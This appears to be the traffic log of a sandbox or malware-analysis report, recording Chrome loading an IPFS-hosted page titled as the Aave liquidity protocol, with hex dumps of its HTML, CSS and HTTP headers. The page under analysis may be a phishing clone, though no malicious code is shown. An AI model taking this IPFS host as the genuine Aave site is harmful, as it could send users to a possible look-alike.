                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC326INData Raw: 37 62 38 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 74 69 74 6c 65 3e 41 61 76 65 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 4c 69 71 75 69 64 69 74 79 20 50 72 6f 74 6f 63 6f 6c 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 20 69 73 20 61 6e 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 50 72 6f 74 6f 63 6f 6c 20 74 6f
                                                                                                                                                                                                                                                  Data Ascii: 7b8b<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 6e 64 20 62 6f 72 72 6f 77 69 6e 67 20 61 73 73 65 74 73 20 77 69 74 68 20 61 20 76 61 72 69 61 62 6c 65 20 6f 72 20 73 74 61 62 6c 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 2e 20 54 68 65 20 70 72 6f 74 6f 63 6f 6c 20 69 73 20 64 65 73 69 67 6e 65 64 20 66 6f 72 20 65 61 73 79 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 69 6e 74 6f 20 79 6f 75 72 20 70 72 6f 64 75 63 74 73 20 61 6e 64 20 73 65 72 76 69 63 65 73 2e 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 4c 69 71 75 69 64 69 74 79 20 50 72 6f 74 6f 63 6f 6c 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                  Data Ascii: nd borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" conten
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 61 76 65 5f 69 63 6f 6e 31 38 30 2e 70 6e 67 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 61 76 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 68 65 61 64 2d 63 6f 75 6e 74 22 20 63 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: ple-touch-icon" href="/aave_icon180.png"/><meta name="apple-mobile-web-app-title" content="Aave"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-bar-style" content="black"/><meta name="next-head-count" con
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 22 63 73 73 2d 67 6c 6f 62 61 6c 20 31 70 72 66 61 78 6e 22 3e 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 6d 75 69 2d 61 75 74 6f 2d 66 69 6c 6c 7b 66 72 6f 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6d 75 69 2d 61 75 74 6f 2d 66 69 6c 6c 7b 66 72 6f 6d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 7d 40 2d 77 65 62
                                                                                                                                                                                                                                                  Data Ascii: -flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}</style><style data-emotion="css-global 1prfaxn">@-webkit-keyframes mui-auto-fill{from{display:block;}}@keyframes mui-auto-fill{from{display:block;}}@-web
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 30 2c 30 2e 31 32 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 32 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 30 35 29 2c 30 70 78 20 30 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 35 29 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69
                                                                                                                                                                                                                                                  Data Ascii: 0,0.12);border-radius:4px;box-shadow:0px 2px 1px rgba(0, 0, 0, 0.05),0px 0px 1px rgba(0, 0, 0, 0.25);display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;wi
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 31 74 70 36 71 33 69 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 70 78 3b 7d 2e 63 73 73 2d 31 6e 6b 69 6a 6c 69 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 2c 41 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 30 30 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 33 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 3b 7d 2e 63 73 73 2d 31 33 61 74 37 79 37 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79
                                                                                                                                                                                                                                                  Data Ascii: 1tp6q3i{padding-right:0px;}.css-1nkijli{margin:0;font-family:Inter,Arial;font-weight:400;letter-spacing:0.009375rem;line-height:143%;font-size:0.875rem;}.css-13at7y7{display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 72 65 6d 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 2c 41 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 30 32 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 3a 30 20 36 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 38 33 44 35 31 3b 63 6f 6c 6f 72 3a 23 45 41 45
                                                                                                                                                                                                                                                  Data Ascii: rem;box-shadow:none;border-radius:4px;font-family:Inter,Arial;font-weight:600;letter-spacing:0.02875rem;line-height:1.25rem;text-transform:uppercase;font-size:0.625rem;padding:0 6px;min-width:90px;margin-left:20px;height:24px;background:#383D51;color:#EAE
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 36 34 70 78 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 32 35
                                                                                                                                                                                                                                                  Data Ascii: ms-user-select:none;user-select:none;vertical-align:middle;-moz-appearance:none;-webkit-appearance:none;-webkit-text-decoration:none;text-decoration:none;color:inherit;min-width:64px;padding:6px 8px;border-radius:4px;-webkit-transition:background-color 25
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 69 73 61 62 6c 65 64 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 63 73 73 2d 31 6c 36 63 37 79 39 7b 64 69 73 70 6c 61 79 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 3b 7d 2e 63 73 73 2d 31 6c 36 63 37 79 39 3e 2a 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 31 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 2e 63 73 73 2d 31 30 64 6f 68 71 76 7b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 65 6d 3b 68 65 69 67 68 74 3a 31 65 6d 3b 64
                                                                                                                                                                                                                                                  Data Ascii: isabled{box-shadow:none;}.css-1l6c7y9{display:inherit;margin-right:8px;margin-left:-4px;}.css-1l6c7y9>*:nth-of-type(1){font-size:20px;}.css-10dohqv{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;width:1em;height:1em;d
                                                                                                                                                                                                                                                  2024-09-28 04:11:37 UTC1369INData Raw: 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 30 2e 33 73 20 65 61 73 65 20 61 6c 6c 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 30 2e 33 73 20 65 61 73 65 20 61 6c 6c 3b 7d 2e 63 73 73 2d 31 61 62 65 67 38 61 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 30 2e 37 3b 7d 2e 63 73 73 2d 35 68 69 63 72 74 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 30 70 78 29 7b 2e 63 73 73 2d 31 6d 65 32 67 63 68 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 36 30 70 78 29 7b 2e 63 73 73 2d 31 6d 65 32 67 63 68 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 7d 2e 63 73 73 2d 31 64 76 68 61 35 6e 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f
                                                                                                                                                                                                                                                  Data Ascii: x;-webkit-transition:0.3s ease all;transition:0.3s ease all;}.css-1abeg8a:hover{opacity:0.7;}.css-5hicrt{margin-right:12px;}@media (min-width:0px){.css-1me2gch{display:none;}}@media (min-width:960px){.css-1me2gch{display:block;}}.css-1dvha5n{list-style:no


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.549709209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC684OUTGET /_next/static/css/0da2d62e1a58e826.css HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 4686
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiesvrqlrl4xi3lyphi7qmju6knqdl76dil4xipne2vjylqikuu244"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeih2sju5rhjze3bvhpchng72lmfzvaeepcg6if3hpwvxgzsofv3tzq,bafkreiesvrqlrl4xi3lyphi7qmju6knqdl76dil4xipne2vjylqikuu244
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC196INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 6c 62 3d 30 32 44 69 75 48 46 70 44 68 63 33 59 41 56 7a 77 42 71 47 56 78 32 33 57 78 37 42 4c 6d 6e 62 73 64 31 53 78 5a 47 39 62 48 65 52 32 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 20 53 65 63 75 72 65 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 39 2d 53 65 70 2d 32 34 20 30 33 3a 31 31 3a 33 38 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 33 66 64 35 63 38 39 38 63 37 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Set-Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2; SameSite=None; Secure; path=/; expires=Sun, 29-Sep-24 03:11:38 GMT; HttpOnlyServer: cloudflareCF-RAY: 8ca0e3fd5c898c7b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC1189INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 54 68 69 6e 2e 64 61 66 61 61 34 34 64 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 54 68 69 6e 2e 31 36 33 32 35 64 39 62 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 3b 66 6f 6e 74 2d 73 74 79 6c
                                                                                                                                                                                                                                                  Data Ascii: @font-face{font-family:Inter;font-style:normal;font-weight:100;font-display:swap;src:url(/_next/static/media/Inter-Thin.dafaa44d.woff2) format("woff2"),url(/_next/static/media/Inter-Thin.16325d9b.woff) format("woff")}@font-face{font-family:Inter;font-styl
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC1369INData Raw: 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 4c 69 67 68 74 49 74 61 6c 69 63 2e 30 61 37 38 33 62 38 39 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 4c 69 67 68 74 49 74 61 6c 69 63 2e 66 38 63 63 66 32 38 31 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77
                                                                                                                                                                                                                                                  Data Ascii: ight:300;font-display:swap;src:url(/_next/static/media/Inter-LightItalic.0a783b89.woff2) format("woff2"),url(/_next/static/media/Inter-LightItalic.f8ccf281.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:400;font-display:sw
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC1369INData Raw: 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 53 65 6d 69 42 6f 6c 64 49 74 61 6c 69 63 2e 64 39 30 66 32 39 35 64 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 53 65 6d 69 42 6f 6c 64 49 74 61 6c 69 63 2e 61 62 39 31 30 35 65 64 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72
                                                                                                                                                                                                                                                  Data Ascii: isplay:swap;src:url(/_next/static/media/Inter-SemiBoldItalic.d90f295d.woff2) format("woff2"),url(/_next/static/media/Inter-SemiBoldItalic.ab9105ed.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:700;font-display:swap;src:ur
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC759INData Raw: 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 42 6c 61 63 6b 49 74 61 6c 69 63 2e 37 35 32 66 31 65 30 61 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 49 6e 74 65 72 2d 42 6c 61 63 6b 49 74 61 6c 69 63 2e 37 30 33 30 36 62 30 65 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 20 76 61 72 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 20 39 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                  Data Ascii: splay:swap;src:url(/_next/static/media/Inter-BlackItalic.752f1e0a.woff2) format("woff2"),url(/_next/static/media/Inter-BlackItalic.70306b0e.woff) format("woff")}@font-face{font-family:Inter var;font-weight:100 900;font-display:swap;font-style:normal;font-


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.549712209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC677OUTGET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15744
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
